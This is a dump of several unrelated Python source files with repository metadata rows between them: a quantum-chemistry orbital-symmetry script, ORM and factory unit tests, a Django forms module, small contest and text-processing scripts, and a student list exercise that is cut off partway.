from pyqchem.symmetry import get_wf_symmetry
from pyqchem.utils import _set_zero_to_coefficients, get_plane, crop_electronic_structure
from pyqchem.qchem_core import get_output_from_qchem, create_qchem_input
from pyqchem.structure import Structure
from pyqchem.file_io import build_fchk
# Define custom classification function
def get_custom_orbital_classification(parsed_fchk,
center=None,
orientation=(0, 0, 1)
):
molsym = get_wf_symmetry(parsed_fchk['structure'],
parsed_fchk['basis'],
parsed_fchk['coefficients'],
center=center,
orientation=orientation)
sh_index = molsym.SymLab.index('i') # operation used to separate orbitals
orbital_type = []
for i, overlap in enumerate(molsym.mo_SOEVs_a[:, sh_index]):
overlap = overlap / molsym.mo_SOEVs_a[i, molsym.SymLab.index('E')] # normalize
if overlap < 0:
orbital_type.append([' NOO', np.abs(overlap)])
else:
orbital_type.append([' YES', np.abs(overlap)])
return orbital_type
dimer_ethene = [[0.0, 0.0000, 0.65750],
[0.0, 0.0000, -0.65750],
[0.0, 0.92281, 1.22792],
[0.0, -0.92281, 1.22792],
[0.0, -0.92281, -1.22792],
[0.0, 0.92281, -1.22792],
[3.7, 0.00000, 0.65750],
[3.7, 0.00000, -0.65750],
[3.7, 0.92281, 1.22792],
[3.7, -0.92281, 1.22792],
[3.7, -0.92281, -1.22792],
[3.7, 0.92281, -1.22792]]
symbols = ['C', 'C', 'H', 'H', 'H', 'H', 'C', 'C', 'H', 'H', 'H', 'H']
range_f1 = range(0, 6)
range_f2 = range(6, 12)
# create molecule
molecule = Structure(coordinates=dimer_ethene,
symbols=symbols,
charge=0,
multiplicity=1)
# create Q-Chem input
qc_input = create_qchem_input(molecule,
jobtype='sp',
exchange='hf',
basis='6-31G')
print(qc_input.get_txt())
# get data from Q-Chem calculation
output, electronic_structure = get_output_from_qchem(qc_input,
processors=4,
force_recalculation=False,
read_fchk=True,
fchk_only=True)
# store original fchk info in file
open('test.fchk', 'w').write(build_fchk(electronic_structure))
# get symmetry classification
electronic_structure_f1 = crop_electronic_structure(electronic_structure, range_f1)
# save test fchk file with new coefficients
open('test_f1.fchk', 'w').write(build_fchk(electronic_structure_f1))
# get plane from coordinates
coordinates_f1 = electronic_structure['structure'].get_coordinates(fragment=range_f1)
center_f1, normal_f1 = get_plane(coordinates_f1)
# get classified orbitals
orbital_type_f1 = get_custom_orbital_classification(electronic_structure_f1,
center=center_f1,
orientation=normal_f1)
# get plane from coordinates
coordinates_f2 = electronic_structure['structure'].get_coordinates(fragment=range_f2)
center_f2, normal_f2 = get_plane(coordinates_f2)
electronic_structure_f2 = crop_electronic_structure(electronic_structure, range_f2)
# save test fchk file with new coefficients
open('test_f2.fchk', 'w').write(build_fchk(electronic_structure_f2))
# get classified orbitals
orbital_type_f2 = get_custom_orbital_classification(electronic_structure_f2,
center=center_f2,
orientation=normal_f2)
# range of orbitals to show
frontier_orbitals = [12, 13, 14, 15, 16, 17, 18, 19, 20]
# Print results in table
print('Inversion center?')
print('index fragment 1 fragment 2')
for i in frontier_orbitals:
print(' {:4} {:4} {:4.3f} {:4} {:4.3f}'.format(i,
orbital_type_f1[i-1][0], orbital_type_f1[i-1][1],
orbital_type_f2[i-1][0], orbital_type_f2[i-1][1]))
| [
"abelcarreras83@gmail.com"
] | abelcarreras83@gmail.com |
cc7027ec8852029b29739182b583c126f29a16cf | 4ab57a7bd592d267d180f0541ee18b4c544eec28 | /tests/orm/mixins/test_soft_deletes.py | bba8c0e6fcda1c345551add5b8b6bc09638e0e42 | [
"MIT"
] | permissive | mattcl/orator | f6cfb687ef8f1c3f5dd9828b2b950edbb5387cc9 | cc3d2154d596f7e6ff4274d7f8d6e8a233e12a9c | refs/heads/0.8 | 2021-01-20T17:27:16.342669 | 2016-06-02T21:55:00 | 2016-06-02T21:55:00 | 66,998,160 | 0 | 1 | null | 2018-02-22T21:29:24 | 2016-08-31T03:08:13 | Python | UTF-8 | Python | false | false | 1,362 | py | # -*- coding: utf-8 -*-
import datetime
import arrow
from flexmock import flexmock, flexmock_teardown
from orator import Model, SoftDeletes
from orator.orm import Builder
from orator.query import QueryBuilder
from ... import OratorTestCase
t = arrow.get().naive
class SoftDeletesTestCase(OratorTestCase):
def tearDown(self):
flexmock_teardown()
def test_delete_sets_soft_deleted_column(self):
model = flexmock(SoftDeleteModelStub())
model.set_exists(True)
builder = flexmock(Builder)
query_builder = flexmock(QueryBuilder(None, None, None))
query = Builder(query_builder)
model.should_receive('new_query').and_return(query)
builder.should_receive('where').once().with_args('id', 1).and_return(query)
builder.should_receive('update').once().with_args({'deleted_at': t})
model.delete()
self.assertIsInstance(model.deleted_at, datetime.datetime)
def test_restore(self):
model = flexmock(SoftDeleteModelStub())
model.set_exists(True)
model.should_receive('save').once()
model.restore()
self.assertIsNone(model.deleted_at)
class SoftDeleteModelStub(SoftDeletes, Model):
def get_key(self):
return 1
def get_key_name(self):
return 'id'
def from_datetime(self, value):
return t
| [
"sebastien.eustace@gmail.com"
] | sebastien.eustace@gmail.com |
b3a14ad9c4108e17bf88773fdbcbf986824b12e7 | f7cd9d1687d1450ea73d7a8d9e0d02e5d0480e56 | /tests/test_ideas_factory.py | b9312e38cfb78b1282394a7b6a1c8a5c38cd27dc | [] | no_license | kjbyleni/My_Art_tools | 5424b1bbbdf98fba526fe0db74d3999d188753cc | 1146eb23b99c4b2474d26cdf7882e3c468d6327e | refs/heads/master | 2020-09-02T14:01:13.977622 | 2020-04-17T02:14:54 | 2020-04-17T02:14:54 | 219,237,054 | 0 | 0 | null | 2019-11-16T14:32:08 | 2019-11-03T01:39:15 | Python | UTF-8 | Python | false | false | 1,227 | py | import ideas.factory as idea_factory
import os
def test_items_keys():
item_obj = idea_factory.get_items()
assert item_obj.keys == ['items']
def test_items_context():
item_obj = idea_factory.get_items()
assert item_obj.context == 'Items'
def test_character_keys():
char_obj = idea_factory.get_character()
assert char_obj.keys == ['shapes', 'physical nature', 'distinguishing characteristic']
def test_character_context():
char_obj = idea_factory.get_character()
assert char_obj.context == 'Character'
def test_env_keys():
env_obj = idea_factory.get_env()
assert env_obj.keys == ['season', 'time', 'inside', 'outside']
def test_env_context():
env_obj = idea_factory.get_env()
assert env_obj.context == 'Environment'
def test_study_keys():
env_obj = idea_factory.get_study()
assert env_obj.keys == ['study', 'anatomy', 'emotion']
def test_study_context():
env_obj = idea_factory.get_study()
assert env_obj.context == 'Study'
def test_exercise_keys():
env_obj = idea_factory.get_exercise()
assert env_obj.keys == ['exercise']
def test_exercise_context():
env_obj = idea_factory.get_exercise()
assert env_obj.context == 'Exercise'
| [
"kjbyleni@gmail.com"
] | kjbyleni@gmail.com |
c509a6a274f2750ee9c99e6d66b55a16e7ca1505 | 481ba835ba4233ecf0c402d022593863f7569fe6 | /rps/feature_tests/steps/rp14a_steps.py | e9ac486012bca1a59c4445c6275db55edbba96dd | [] | no_license | InsolvencyService/rps-alpha | 4e9830b6fd98569b567086a626de7f102c34658d | 35d8ad405f780df722087b77713875dd53588836 | refs/heads/master | 2021-06-03T00:57:53.729646 | 2018-12-11T14:48:26 | 2018-12-11T14:48:26 | 13,813,519 | 0 | 2 | null | 2013-12-16T11:41:14 | 2013-10-23T20:11:21 | Python | UTF-8 | Python | false | false | 241 | py | from hamcrest import *
from BeautifulSoup import BeautifulSoup
from insolvency_practitioner_forms import routes
ip_routes_app = routes.app
@given('the IP app is running')
def step(context):
context.client = ip_routes_app.test_client()
| [
"legionsofbob@gmail.com"
] | legionsofbob@gmail.com |
af332a236823d827a64916a5d5d0c8c6f302da93 | 0668404b877fb65d61f1131ea7529dda622286c8 | /Competitive Prog/Hackerearth/CodeJam1.py | ff00cbfbf8d896eea3bcad0e82aa28ece2d3f56d | [] | no_license | nikhiljsk/Programming | 1137128f787ccd5eef45f8aff91128f740195592 | 8226c2320809d252eb3a49149044c0cd217391b4 | refs/heads/master | 2020-05-03T21:50:56.230712 | 2020-02-28T10:18:22 | 2020-02-28T10:18:22 | 178,832,071 | 0 | 0 | null | 2020-02-20T12:33:26 | 2019-04-01T09:41:38 | HTML | UTF-8 | Python | false | false | 363 | py | T=int(input())
list=[]
for k in range(T):
n=int(input())
arr=[int(x) for x in input().split()]
if len(arr)%2==0:
mid=arr[(len(arr)//2)-1]
else:
mid=arr[len(arr)//2]
if mid<max(arr):
list.append("NO")
else:
list.append("YES")
for i in range(T):
print("Case #",i+1,": ",list[i],sep="")
| [
"nikhiljs@in.ibm.com"
] | nikhiljs@in.ibm.com |
a48f9ce7134339daba69ce77b2e663a22115549f | 37b0463cff838bac87ad1022313f67bcb81574d3 | /NCRE/5/PY103.py | 171f4a109c753fec5daf1800a8313055c1f9571e | [] | no_license | NekoPlusPro/pythonProject | b9433822d53e94a09baa2335dcc8375d90424e55 | a0fa93c072a4952f06e55d9a617f4b3f3e38dd99 | refs/heads/master | 2023-08-24T15:04:15.591663 | 2021-10-15T07:07:53 | 2021-10-15T07:07:53 | 389,867,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | import jieba
s = input("请输入一个中文字符串,包含标点符号:")
m =jieba.lcut(s)
print("中文词语数:{}".format(len(m)))
| [
"jiax_chen@outlook.com"
] | jiax_chen@outlook.com |
067db6a7d37d2731fadc3e9a13608743f89b927e | 174175047154ee1afb4699c6f6073bcfd506b7f9 | /blog/forms.py | adc72623ff4fce416568d8db7ce502cd921c85e7 | [] | no_license | RusPatrick/webweb | e19f9d15008dcfba14cef0e139487e171dee94e4 | 9f7c88bc358e88e95c0c17f7984207a0a408cd84 | refs/heads/master | 2020-03-18T03:57:43.814834 | 2018-05-21T20:24:41 | 2018-05-21T20:24:41 | 134,264,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,622 | py | from django import forms
from django.forms import ModelForm
from django.core.exceptions import ValidationError
from blog.models import *
import re
from django.contrib.auth.forms import AuthenticationForm, UserCreationForm
class SignInForm(AuthenticationForm):
username = forms.CharField(widget=forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Login'
}))
password = forms.CharField(widget=forms.PasswordInput(attrs={
'class': 'form-control',
'placeholder': 'Password'
}))
def clean_username(self):
data = self.cleaned_data.get('username')
if Profile.objects.filter(username=data).first() is None:
raise ValidationError('User does not exist.')
else:
return data;
class Meta:
model = Profile
fields = ('username', 'password')
widgets = {
'username': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Login'}),
'password': forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),
}
class SignUpForm(UserCreationForm):
password2 = forms.CharField(widget=forms.PasswordInput(attrs={
'class': 'form-control',
'placeholder': 'Confirm password'
}))
password1 = forms.CharField(widget=forms.PasswordInput(attrs={
'class': 'form-control',
'placeholder': 'Password'
}))
def clean_email(self):
email = self.cleaned_data.get('email')
if email == '':
return ''
else:
if Profile.objects.filter(email=email).first() is None:
return email
else:
raise ValidationError('User with this email already exists.')
def save(self, commit=True):
user = super(SignUpForm, self).save(commit=False)
user.email = self.cleaned_data.get('email')
return super(SignUpForm, self).save(commit=commit)
class Meta:
model = Profile
fields = ('username', 'password1', 'password2', 'avatar', 'email')
widgets = {
'username': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Login'}),
'password1': forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),
'password2': forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Confirm password'}),
'email': forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Email'}),
}
class AnswerForm(ModelForm):
class Meta:
model = Answer
fields = ['text']
widgets = {
'text': forms.Textarea(attrs={
'class': 'form-control',
'rows': 5,
'placeholder': 'Write your answer here'
})
}
class AskForm(ModelForm):
tagsInput = forms.CharField(
required=False,
help_text='Input 0 to 3 tags separated by space each less than 15 characters.',
widget=forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Tags'
})
)
class Meta:
model = Question
fields = ['title', 'text']
widgets = {
'text': forms.Textarea(attrs={
'class': 'form-control',
'rows': 10,
'placeholder': 'Write your question here'
}),
'title': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Title'
})
}
def clean_tagsInput(self):
data = self.cleaned_data.get('tagsInput')
data = data.strip()
data = re.sub("\s{2,}", " ", data)
pattern = "^\s*(\w+,?\s*){0,3}$"
if re.match(pattern, data):
tags = re.split(",+\s*|\s+", data)
else:
raise ValidationError('Invalid format.')
for tag in tags:
if len(tag) >= 15:
raise ValidationError('Tag is too long.')
return tags
def save(self, commit=True):
tags = self.cleaned_data.get('tagsInput')
super(AskForm, self).save(commit=True)
for tag in tags:
if tag != '':
obj, created = Tag.objects.get_or_create(name=tag)
self.instance.tags.add(obj)
return super(AskForm, self).save(commit=commit)
class EditProfileForm(ModelForm):
class Meta:
model = Profile
fields = ['username', 'email', 'avatar']
widgets = {
'username': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Login'
}),
'email': forms.EmailInput(attrs={
'class': 'form-control',
'placeholder': 'Email'
}),
}
def clean_email(self):
email = self.cleaned_data.get('email')
if email == '':
return None
else:
u = Profile.objects.filter(email=email).first()
if u is None or u.username == self.cleaned_data.get('username'):
return email
else:
raise ValidationError('User with this email already exists.')
| [
"farrahov95@mail.ru"
] | farrahov95@mail.ru |
fc65e98b5359b427bc37ea833f866504ae8226cd | 8a5b77c7f36315f87eb163fdf51ae98f683bae91 | /cvd_algorithm_v0.3/procedure/converting_to_hash.py | 6b4a22eaef862717151a662cedf0bff219392a5a | [] | no_license | Poetickz/color_vision_deficiency | 9c237ae657c65d243ff58c23e1c47996999e59c3 | 2b3fa9fe1a666455ba7458cd95fa483fb8e75f07 | refs/heads/master | 2021-01-16T12:26:49.153036 | 2020-05-18T04:47:15 | 2020-05-18T04:47:15 | 243,120,286 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 485 | py |
def get_hsl_from_file(file):
f = open(file, "r")
lines = f.readlines()
data = { }
for line in lines:
x = int(line.split()[0])
y = float(line.split()[1])
data[x] = y
return data
f = open("hash_hsl.txt","w+")
data = get_hsl_from_file("resume_hsl.txt")
cont = 0
for hue, intensity_array in data.items():
if (cont == 10):
f.write("\n")
cont = 0
f.write(str(hue)+":"+str(intensity_array)+", ")
cont += 1
f.close() | [
"alan.rocha@udem.edu"
] | alan.rocha@udem.edu |
35c250eabd05a89ce60377c5d21af072fff01915 | ee33c593dd690122705e6597e81c5580b43ff88f | /214. Shortest Palindrome.py | 314bea03c78e485c4a783cebbae9e8a83054cf61 | [] | no_license | xsu100/LeetCode_python | a8e652cc80cada9f2c4c38ac586453aa0b89e25f | f1701f18dca4238aa4ac4d54142b16397053a50f | refs/heads/master | 2020-04-06T07:11:45.815427 | 2016-09-08T03:18:47 | 2016-09-08T03:18:47 | 63,474,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | class Solution(object):
def doNext(self, s):
next = [0]
for i in range(1, len(s)):
j = next[i-1]
while j and s[i] != s[j]:
j = next[j-1]
next.append(j + 1 if s[i] == s[j] else 0)
return next
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
if s == s[::-1]:
return s
next = self.doNext(s + "#" + s[::-1])
return s[next[-1]:][::-1] + s | [
"suxing.main@gmail.com"
] | suxing.main@gmail.com |
d5fd16ef715a4dc1067eba05edae77d187a5af47 | c3829a2e0de7e67ca5eb588c2ae63bb8854829dd | /train_9.py | a68e903dfd6d6210b24b3748138664be22a1fa5e | [] | no_license | gikr/paac_corrected2 | ea6baca7e184942ee1ba08b8063b08fc858b0918 | a5dd0e76337acab735585048d7df533545567104 | refs/heads/master | 2020-03-20T19:28:24.991558 | 2018-11-14T08:42:31 | 2018-11-14T08:42:31 | 137,639,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,776 | py | import argparse
import logging
import os
import signal
import sys
import torch
#from emulators import VizdoomGamesCreator, AtariGamesCreator
from emulators import TLabyrinthCreator
import utils
import utils.evaluate as evaluate
#from networks import vizdoom_nets, atari_nets
from batch_play import ConcurrentBatchEmulator, SequentialBatchEmulator, WorkerProcess
#import multiprocessing
from networks import tlab_nets, tlab_nets_little
from paac import PAACLearner_9
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
FF_HISTORY_WINDOW=4
LSTM_HISTORY_WINDOW=1
ARGS_FILE='args.json'
def args_to_str(args):
lines = ['','ARGUMENTS:']
newline = os.linesep
args = vars(args)
for key in sorted(args.keys()):
lines.append(' "{0}": {1}'.format(key, args[key]))
return newline.join(lines)
exit_handler = None
def set_exit_handler(new_handler_func=None):
#for some reason a creation of Vizdoom game(which starts a new subprocess) drops all previously set singal handlers.
#therefore we reset handler_func right new games creation, which apparently happens only in the eval_network and main
global exit_handler
if new_handler_func is not None:
exit_handler = new_handler_func
if exit_handler:
print('set up exit handler!')
for sig in (signal.SIGINT, signal.SIGTERM):
signal.signal(sig, exit_handler)
def concurrent_emulator_handler(batch_env):
logging.debug('setup signal handler!!')
main_process_pid = os.getpid()
def signal_handler(signal, frame):
if os.getpid() == main_process_pid:
logging.info('Signal ' + str(signal) + ' detected, cleaning up.')
batch_env.close()
logging.info('Cleanup completed, shutting down...')
sys.exit(0)
return signal_handler
def eval_network(len_int, network, env_creator, num_episodes, is_recurrent, greedy=False):
emulator = SequentialBatchEmulator(env_creator, num_episodes, False)
try:
print(network, emulator)
print("accepted length", len_int)
stats = evaluate.stats_eval(network, len_int, emulator, is_recurrent=is_recurrent, greedy=greedy)
finally:
emulator.close()
set_exit_handler()
return stats
def main(args):
network_creator, env_creator = get_network_and_environment_creator(args)
utils.save_args(args, args.debugging_folder, file_name=ARGS_FILE)
logging.info('Saved args in the {0} folder'.format(args.debugging_folder))
logging.info(args_to_str(args))
batch_env = ConcurrentBatchEmulator(WorkerProcess, env_creator, args.num_workers, args.num_envs)
set_exit_handler(concurrent_emulator_handler(batch_env))
try:
batch_env.start_workers()
learner = PAACLearner_9(network_creator, batch_env, args)
learner.set_eval_function(eval_network,
learner.network, env_creator, 50, learner.use_rnn) # args to eval_network
learner.train()
finally:
batch_env.close()
def get_network_and_environment_creator(args, random_seed=None):
if args.arch == 'lstm':
args.history_window = LSTM_HISTORY_WINDOW
elif args.arch == 'ff':
args.history_window = FF_HISTORY_WINDOW
if (not hasattr(args, 'random_seed')) or (random_seed is not None):
args.random_seed = 3
if args.framework == 'T_lab':
env_creator = TLabyrinthCreator(args)
Network = tlab_nets[args.arch]
if args.framework == 'T_lab_little':
env_creator = TLabyrinthCreator(args)
Network = tlab_nets_little[args.arch]
device = args.device
print(env_creator)
num_actions = env_creator.num_actions
obs_shape = env_creator.obs_shape
def network_creator():
if device == 'gpu':
network = Network(num_actions, obs_shape, torch.cuda)
network = network.cuda()
logging.debug("Moved network's computations on a GPU")
else:
network = Network(num_actions, obs_shape, torch)
return network
print('i am here', network_creator, env_creator)
return network_creator, env_creator
def add_paac_args(parser, framework):
devices =['gpu', 'cpu'] if torch.cuda.is_available() else ['cpu']
default_device = devices[0]
nets = tlab_nets if framework == 'T_lab' else tlab_nets_little
net_choices = list(nets.keys())
default_workers = 8
show_default = " [default: %(default)s]"
parser.add_argument('-d', '--device', default=default_device, type=str, choices=devices,
help="Device to be used ('cpu' or 'gpu'). " +
"Use CUDA_VISIBLE_DEVICES to specify a particular gpu" + show_default,
dest="device")
parser.add_argument('--e', default=1e-8, type=float,
help="Epsilon for the Rmsprop and Adam optimizers."+show_default, dest="e")
parser.add_argument('-lr', '--initial_lr', default=1e-3, type=float,
help="Initial value for the learning rate."+show_default, dest="initial_lr",)
parser.add_argument('-lra', '--lr_annealing_steps', default=100000000, type=int,
help="Nr. of global steps during which the learning rate will be linearly" +
"annealed towards zero." + show_default,
dest="lr_annealing_steps")
parser.add_argument('--entropy', default=0.02, type=float,
help="Strength of the entropy regularization term (needed for actor-critic). "+show_default,
dest="entropy_regularisation_strength")
parser.add_argument('--clip_norm', default=3.0, type=float,
help="If clip_norm_type is local/global, grads will be"+
"clipped at the specified maximum (average) L2-norm. "+show_default,
dest="clip_norm")
parser.add_argument('--clip_norm_type', default="global",
help="""Whether to clip grads by their norm or not. Values: ignore (no clipping),
local (layer-wise norm), global (global norm)"""+show_default,
dest="clip_norm_type")
parser.add_argument('--gamma', default=0.99, type=float, help="Discount factor."+show_default, dest="gamma")
parser.add_argument('--max_global_steps', default=20000000, type=int,
help="Number of training steps."+show_default,
dest="max_global_steps")
parser.add_argument('--max_local_steps', default=10, type=int,
help="Number of steps to gain experience from before every update. "+show_default,
dest="max_local_steps")
parser.add_argument('-n', '--num_envs', default=32, type=int,
help="Number of environments to run simultaneously. "+show_default, dest="num_envs")
parser.add_argument('-w', '--workers', default=default_workers, type=int,
help="Number of parallel worker processes to run the environments. "+show_default,
dest="num_workers")
parser.add_argument('-df', '--debugging_folder', default='logs/', type=str,
help="Folder where to save training progress.", dest="debugging_folder")
parser.add_argument('--arch', choices=net_choices, help="Which network architecture to train"+show_default,
dest="arch")
parser.add_argument('--loss_scale', default=5., dest='loss_scaling', type=float,
help='Scales loss according to a given value'+show_default )
parser.add_argument('--critic_coef', default=0.25, dest='critic_coef', type=float,
help='Weight of the critic loss in the total loss'+show_default)
def get_arg_parser():
parser = argparse.ArgumentParser()
framework_parser = parser.add_subparsers(
help='An RL friendly framework for agent-environment interaction',
dest = 'framework')
Tlab_parser = framework_parser.add_parser('T_lab', help="Arguments for the T labyrinth")
TLabyrinthCreator.add_required_args(Tlab_parser)
Tlab_little_parser = framework_parser.add_parser('T_lab_little', help="Arguments for the T labyrinth")
TLabyrinthCreator.add_required_args(Tlab_little_parser)
for framework, subparser in [('T_lab', Tlab_parser), ('T_lab_little', Tlab_little_parser)]:
paac_group = subparser.add_argument_group(
title='PAAC arguments', description='Arguments specific to the algorithm')
add_paac_args(paac_group, framework)
return parser
if __name__ == '__main__':
args = get_arg_parser().parse_args()
main(args)
| [
"noreply@github.com"
] | gikr.noreply@github.com |
a990b8ea1139dede145faaa6e5b5eacaf7f8467b | 23367267f320c65aead807c848b0b43b00f73235 | /2sep21db/deletecolumn.py | 45fa4378bd6dc3e33b382f83568d0de6b95a73bf | [] | no_license | GayatriMhetre21/python10aug21 | 61a51a2e27fff69251a1282ee23cecd17c80bdea | a2aaff7caa34432e95f4a9d9ee4ebb59fe5da9c0 | refs/heads/master | 2023-07-19T12:54:19.333807 | 2021-09-15T12:57:45 | 2021-09-15T12:57:45 | 394,551,723 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | #-write program to delete specific row of table
import MySQLdb
try:
mycon=MySQLdb.connect(host="localhost",user="root",passwd="",database="studentdb")
print("mycon excecute")
cur=mycon.cursor()
print("cursor excecute")
query="alter table stdinform drop column moblie"
cur.execute(query)
print("excecute excecute")
print("execute query")
mycon.commit()
print(query+"column deleted successfully .... ")
except:
print("column not deleted ")
finally:
cur.close()
print("cursor connection close....")
mycon.close()
print("DB connection close....") | [
"noreply@github.com"
] | GayatriMhetre21.noreply@github.com |
24efa99c0630960c0e5bfd0f242ddb334c6ae807 | a598954ebe57595ca60387686059da19440d953f | /renren | 4ecbea4f53e9803dae47c249f3f18bb52ee0a34f | [] | no_license | dcshenyufei/buptsyf | 62068064e4bf69142f9e9ceccc32214321a1f6cc | d21d2f5737cddd46ae0395ae0750d7b88bdef1c1 | refs/heads/master | 2021-01-17T17:08:18.461384 | 2013-12-17T15:31:25 | 2013-12-17T15:31:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,903 | #!/usr/bin/env python
#encoding=utf-8
import sys
import re
import urllib2
import urllib
import cookielib
class Renren(object):
def __init__(self):
self.name = self.pwd = self.content = self.domain = self.origURL = ''
self.operate = ''#登录进去的操作对象
self.cj = cookielib.LWPCookieJar()
try:
self.cj.revert('renren.coockie')
except Exception,e:
print e
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
urllib2.install_opener(self.opener)
def setinfo(self,username,password,domain,origURL):
'''设置用户登录信息'''
self.name = username
self.pwd = password
self.domain = domain
self.origURL = origURL
def login(self):
'''登录人人网'''
params = {'domain':self.domain,'origURL':self.origURL,'email':self.name, 'password':self.pwd}
print 'login.......'
req = urllib2.Request(
'http://www.renren.com/PLogin.do',
urllib.urlencode(params)
)
self.operate = self.opener.open(req)
if self.operate.geturl() == 'http://www.renren.com/Home.do':
print 'Logged on successfully!'
self.cj.save('renren.coockie')
self.__viewnewinfo()
else:
print 'Logged on error'
def __viewnewinfo(self):
'''查看好友的更新状态'''
self.__caiinfo()
def __caiinfo(self):
'''采集信息'''
h3patten = re.compile('<h3>(.*?)</h3>')#匹配范围
apatten = re.compile('<a.+>(.+)</a>:')#匹配作者
cpatten = re.compile('</a>(.+)\s')#匹配内容
infocontent = self.operate.readlines()
# print infocontent
print 'friend newinfo:'
for i in infocontent:
content = h3patten.findall(i)
if len(content) != 0:
for m in content:
username = apatten.findall(m)
info = cpatten.findall(m)
if len(username) !=0:
print username[0],'说:',info[0]
print '----------------------------------------------'
else:
continue
ren = Renren()
username = ''#你的人人网的帐号
password = ''#你的人人网的密码
domain = 'renren.com'#人人网的地址
origURL = 'http://www.renren.com/Home.do'#人人网登录以后的地址
ren.setinfo(username,password,domain,origURL)
ren.login()
主要用到了python cookielib,urllib2,urllib这3个模块,这3个模块是python做http这方面比较好的模块.
self.cj = cookielib.LWPCookieJar()
try:
self.cj.revert('renren.coockie')
except Exception,e:
print e
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
urllib2.install_opener(self.opener)
| [
"289601878@qq.com"
] | 289601878@qq.com | |
b39f13d2074aeca81ea0122e5172cb7a038e9c2b | 6c59dd487761a3d1d161d2d32680b659c26676c7 | /sexual_problems.py | 0caaf60d39af4a2bdfb1da3fd07a8001893e4377 | [
"MIT"
] | permissive | sourabhtk37/Ladyproblem-Hackthon | 7a2bdd03e49624757bef5f50dcd16ddc0ce49304 | a1b63cda5292b702c65b818605e8dab5076c5a9b | refs/heads/master | 2021-01-11T02:56:04.108589 | 2016-10-15T19:30:32 | 2016-10-15T19:30:32 | 70,905,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,364 | py | import operator
result = [{u'faceRectangle': {u'width': 220, u'top': 124, u'left': 319, u'height': 220}, u'scores': {u'sadness': 2.405169e-06, u'neutral': 0.004737595, u'contempt': 3.80436541e-05, u'disgust': 1.12454254e-05, u'anger': 2.84782072e-06, u'surprise': 4.09142376e-06, u'fear': 3.45566669e-08, u'happiness': 0.995203733}}, {u'faceRectangle': {u'width': 153, u'top': 226, u'left': 25, u'height': 153}, u'scores': {u'sadness': 0.0006249004, u'neutral': 0.9822587, u'contempt': 0.0138994809, u'disgust': 7.737188e-06, u'anger': 2.87497733e-05, u'surprise': 7.097867e-05, u'fear': 4.812748e-07, u'happiness': 0.00310896849}}]
result2=[{u'faceId': u'74559527-cfd2-4a5b-b6ce-91fb0d116fd6', u'faceRectangle': {u'width': 220, u'top': 124, u'height': 220, u'left': 319}, u'faceAttributes': {u'gender': u'male', u'age': 28.8}}, {u'faceId': u'7a737fd7-7318-4896-8ae2-e888fa33333c', u'faceRectangle': {u'width': 153, u'top': 226, u'height': 153, u'left': 25}, u'faceAttributes': {u'gender': u'male', u'age': 28.1}}]
for currFace in range(len(result)):
result1_Face = result[currFace]
faceRectangle = result1_Face['faceRectangle']
currEmotion = max(result1_Face['scores'].items(), key=operator.itemgetter(1))[0]
result2_face = result2[currFace]
age = result2_face['faceAttributes']['age']
gender = result2_face['faceAttributes']['gender']
print(currEmotion) | [
"sourabhtk37@gmail.com"
] | sourabhtk37@gmail.com |
8595a028911ac6f9661ca4adf4b81d4d4d765ec9 | 91a276499d81615ad703bd48407681694918cb5d | /students/BrianE/session03/list_lab.py | 7eae4d86ee118206fce1586745a184e950d23746 | [] | no_license | colephalen/SP_2019_210A_classroom | 2ed68fea0ffe322d2f55d4ebc5bdde6bf17ee842 | a17145bdcd235f9853f5f0c2feca20cf49df7f30 | refs/heads/master | 2020-05-07T12:08:25.854445 | 2019-06-15T03:38:45 | 2019-06-15T03:38:45 | 180,490,097 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,011 | py | #!/usr/env python3
"""
list_lab.py
"""
def display_fruits(fruits):
"""
Print fruit list contents to terminal
:param fruits: list of fruits
:return: None
"""
print("Current fruit: {}".format(fruits))
def delete_fruits(fruits):
"""
Delete fruit item from list
:param fruits: string
:return: None
"""
print(fruits)
fruit_to_delete = input("Enter a fruit to delete: \n\n >>>")
try:
index = fruits.index(fruit_to_delete)
del fruits[index]
except ValueError as e:
print(e)
def cleanup_list(fruits):
"""
Remove fruits from list if user does not like
:param fruits: list of fruits
:return: None
"""
deleted_fruits = []
for i in range(0, len(fruits)):
while True:
answer = input(f"Do you like {fruits[i]}?").lower().strip()
if answer == 'yes':
break
elif answer == 'no':
deleted_fruits.append(fruits[i])
break
else:
print(f"Please choose from the following: yes|no")
continue
for fruit in deleted_fruits:
fruits.remove(fruit)
def main():
"""
Series 1
* Create a list that contains “Apples”, “Pears”, “Oranges” and “Peaches”.
* Display the list (plain old print() is fine…).
* Ask the user for another fruit and add it to the end of the list.
* Display the list.
* Ask the user for a number and display the number back to the user and the fruit corresponding to that number
(on a 1-is-first basis). Remember that Python uses zero-based indexing, so you will need to correct.
* Add another fruit to the beginning of the list using “+” and display the list.
* Add another fruit to the beginning of the list using insert() and display the list.
* Display all the fruits that begin with “P”, using a for loop.
"""
fruits = ["Apples", "Pears", "Oranges", "Peaches"]
display_fruits(fruits)
fruits.append(input("Which fruit would you like to add?\n\n >>>"))
display_fruits(fruits)
number = int(input("Please enter a number: \n\n >>>"))
print(f"You entered {number}, which corresponds with {fruits[number - 1]}")
fruits = list([input("Enter another fruit: \n\n >>>")]) + fruits
display_fruits(fruits)
